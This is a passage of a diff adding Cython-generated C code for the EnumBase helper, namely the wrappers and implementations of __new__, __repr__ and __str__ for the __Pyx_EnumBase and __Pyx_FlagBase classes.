+ __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumBase":39 + * cls.__members__[name] = res + * return res + * def __repr__(self): # <<<<<<<<<<<<<< + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("EnumBase.__Pyx_EnumBase.__repr__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":41 + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): # <<<<<<<<<<<<<< + * return "%s.%s" % (self.__class__.__name__, self.name) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumBase_5__str__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_14__Pyx_EnumBase_5__str__ = {"__str__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_EnumBase_5__str__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumBase_5__str__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_self = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__str__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_self,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_self)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 41, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__str__") < 0)) __PYX_ERR(1, 41, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_self = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__str__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 41, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__Pyx_EnumBase.__str__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_EnumBase_4__str__(__pyx_self, __pyx_v_self); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumBase_4__str__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__str__", 0); + + /* "EnumBase":42 + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + * return "%s.%s" % (self.__class__.__name__, self.name) # <<<<<<<<<<<<<< + * + * if PY_VERSION_HEX >= 0x03040000: + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_self, __pyx_n_s_class); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 42, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_name_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 42, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_self, __pyx_n_s_name); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 42, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 42, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_2); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __pyx_t_2 = 0; + __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_s_s, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 42, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumBase":41 + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): # <<<<<<<<<<<<<< + * return "%s.%s" % (self.__class__.__name__, self.name) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("EnumBase.__Pyx_EnumBase.__str__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":49 + * cdef object __Pyx_FlagBase + * class __Pyx_FlagBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): # <<<<<<<<<<<<<< + * for v in cls: + * if v == value: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_FlagBase_1__new__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_14__Pyx_FlagBase_1__new__ = {"__new__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_FlagBase_1__new__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_14__Pyx_FlagBase_1__new__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_cls = 0; + PyObject *__pyx_v_value = 0; + PyObject *__pyx_v_name = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__new__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_cls,&__pyx_n_s_value,&__pyx_n_s_name,0}; + PyObject* values[3] = {0,0,0}; + values[2] = ((PyObject *)((PyObject *)Py_None)); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_cls)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 49, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_value)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 49, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__new__", 0, 2, 3, 1); __PYX_ERR(1, 49, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_name); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 49, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__new__") < 0)) __PYX_ERR(1, 49, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_cls = values[0]; + __pyx_v_value = values[1]; + __pyx_v_name = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__new__", 0, 2, 3, __pyx_nargs); __PYX_ERR(1, 49, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__Pyx_FlagBase.__new__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_FlagBase___new__(__pyx_self, __pyx_v_cls, __pyx_v_value, __pyx_v_name); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_FlagBase___new__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_cls, PyObject *__pyx_v_value, PyObject *__pyx_v_name) { + PyObject *__pyx_v_v = NULL; + PyObject *__pyx_v_res = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t __pyx_t_2; + PyObject *(*__pyx_t_3)(PyObject *); + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + PyObject *__pyx_t_6 = NULL; + int __pyx_t_7; + int __pyx_t_8; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__new__", 0); + + /* "EnumBase":50 + * class __Pyx_FlagBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): + * for v in cls: # <<<<<<<<<<<<<< + * if v == value: + * return v + */ + if (likely(PyList_CheckExact(__pyx_v_cls)) || PyTuple_CheckExact(__pyx_v_cls)) { + __pyx_t_1 = __pyx_v_cls; __Pyx_INCREF(__pyx_t_1); __pyx_t_2 = 0; + __pyx_t_3 = NULL; + } else { + __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_v_cls); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 50, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 50, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_3)) { + if (likely(PyList_CheckExact(__pyx_t_1))) { + if (__pyx_t_2 >= PyList_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(1, 50, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 50, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } else { + if (__pyx_t_2 >= PyTuple_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(1, 50, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 50, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } + } else { + __pyx_t_4 = __pyx_t_3(__pyx_t_1); + if (unlikely(!__pyx_t_4)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(1, 50, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_4); + } + __Pyx_XDECREF_SET(__pyx_v_v, __pyx_t_4); + __pyx_t_4 = 0; + + /* "EnumBase":51 + * def __new__(cls, value, name=None): + * for v in cls: + * if v == value: # <<<<<<<<<<<<<< + * return v + * res = int.__new__(cls, value) + */ + __pyx_t_4 = PyObject_RichCompare(__pyx_v_v, __pyx_v_value, Py_EQ); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 51, __pyx_L1_error) + __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(1, 51, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (__pyx_t_5) { + + /* "EnumBase":52 + * for v in cls: + * if v == value: + * return v # <<<<<<<<<<<<<< + * res = int.__new__(cls, value) + * if name is None: + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_v); + __pyx_r = __pyx_v_v; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumBase":51 + * def __new__(cls, value, name=None): + * for v in cls: + * if v == value: # <<<<<<<<<<<<<< + * return v + * res = int.__new__(cls, value) + */ + } + + /* "EnumBase":50 + * class __Pyx_FlagBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): + * for v in cls: # <<<<<<<<<<<<<< + * if v == value: + * return v + */ + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "EnumBase":53 + * if v == value: + * return v + * res = int.__new__(cls, value) # <<<<<<<<<<<<<< + * if name is None: + * + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(((PyObject *)(&PyInt_Type)), __pyx_n_s_new); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 53, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_6 = NULL; + __pyx_t_7 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_6)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_6); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_7 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_6, __pyx_v_cls, __pyx_v_value}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_7, 2+__pyx_t_7); + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 53, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __pyx_v_res = __pyx_t_1; + __pyx_t_1 = 0; + + /* "EnumBase":54 + * return v + * res = int.__new__(cls, value) + * if name is None: # <<<<<<<<<<<<<< + * + * res.name = "" + */ + __pyx_t_5 = (__pyx_v_name == Py_None); + if (__pyx_t_5) { + + /* "EnumBase":56 + * if name is None: + * + * res.name = "" # <<<<<<<<<<<<<< + * else: + * res.name = name + */ + if (__Pyx_PyObject_SetAttrStr(__pyx_v_res, __pyx_n_s_name, __pyx_kp_s_) < 0) __PYX_ERR(1, 56, __pyx_L1_error) + + /* "EnumBase":54 + * return v + * res = int.__new__(cls, value) + * if name is None: # <<<<<<<<<<<<<< + * + * res.name = "" + */ + goto __pyx_L7; + } + + /* "EnumBase":58 + * res.name = "" + * else: + * res.name = name # <<<<<<<<<<<<<< + * setattr(cls, name, res) + * cls.__members__[name] = res + */ + /*else*/ { + if (__Pyx_PyObject_SetAttrStr(__pyx_v_res, __pyx_n_s_name, __pyx_v_name) < 0) __PYX_ERR(1, 58, __pyx_L1_error) + + /* "EnumBase":59 + * else: + * res.name = name + * setattr(cls, name, res) # <<<<<<<<<<<<<< + * cls.__members__[name] = res + * return res + */ + __pyx_t_8 = PyObject_SetAttr(__pyx_v_cls, __pyx_v_name, __pyx_v_res); if (unlikely(__pyx_t_8 == ((int)-1))) __PYX_ERR(1, 59, __pyx_L1_error) + + /* "EnumBase":60 + * res.name = name + * setattr(cls, name, res) + * cls.__members__[name] = res # <<<<<<<<<<<<<< + * return res + * def __repr__(self): + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_cls, __pyx_n_s_members); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 60, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + if (unlikely((PyObject_SetItem(__pyx_t_1, __pyx_v_name, __pyx_v_res) < 0))) __PYX_ERR(1, 60, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_L7:; + + /* "EnumBase":61 + * setattr(cls, name, res) + * cls.__members__[name] = res + * return res # <<<<<<<<<<<<<< + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_res); + __pyx_r = __pyx_v_res; + goto __pyx_L0; + + /* "EnumBase":49 + * cdef object __Pyx_FlagBase + * class __Pyx_FlagBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): # <<<<<<<<<<<<<< + * for v in cls: + * if v == value: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("EnumBase.__Pyx_FlagBase.__new__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_v); + __Pyx_XDECREF(__pyx_v_res); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":62 + * cls.__members__[name] = res + * return res + * def __repr__(self): # <<<<<<<<<<<<<< + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_FlagBase_3__repr__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_14__Pyx_FlagBase_3__repr__ = {"__repr__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_FlagBase_3__repr__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_14__Pyx_FlagBase_3__repr__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_self = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__repr__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_self,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_self)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 62, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__repr__") < 0)) __PYX_ERR(1, 62, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_self = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__repr__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 62, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__Pyx_FlagBase.__repr__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_FlagBase_2__repr__(__pyx_self, __pyx_v_self); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_FlagBase_2__repr__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__repr__", 0); + + /* "EnumBase":63 + * return res + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) # <<<<<<<<<<<<<< + * def __str__(self): + * return "%s.%s" % (self.__class__.__name__, self.name) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_self, __pyx_n_s_class); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 63, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_name_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 63, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_self, __pyx_n_s_name); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 63, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 63, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_2); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __Pyx_INCREF(__pyx_v_self); + __Pyx_GIVEREF(__pyx_v_self); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_v_self); + __pyx_t_2 = 0; + __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_s_s_d, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 63, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumBase":62 + * cls.__members__[name] = res + * return res + * def __repr__(self): # <<<<<<<<<<<<<< + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("EnumBase.__Pyx_FlagBase.__repr__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":64 + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): # <<<<<<<<<<<<<< + * return "%s.%s" % (self.__class__.__name__, self.name) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_FlagBase_5__str__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_14__Pyx_FlagBase_5__str__ = {"__str__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_FlagBase_5__str__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_14__Pyx_FlagBase_5__str__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_self = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int 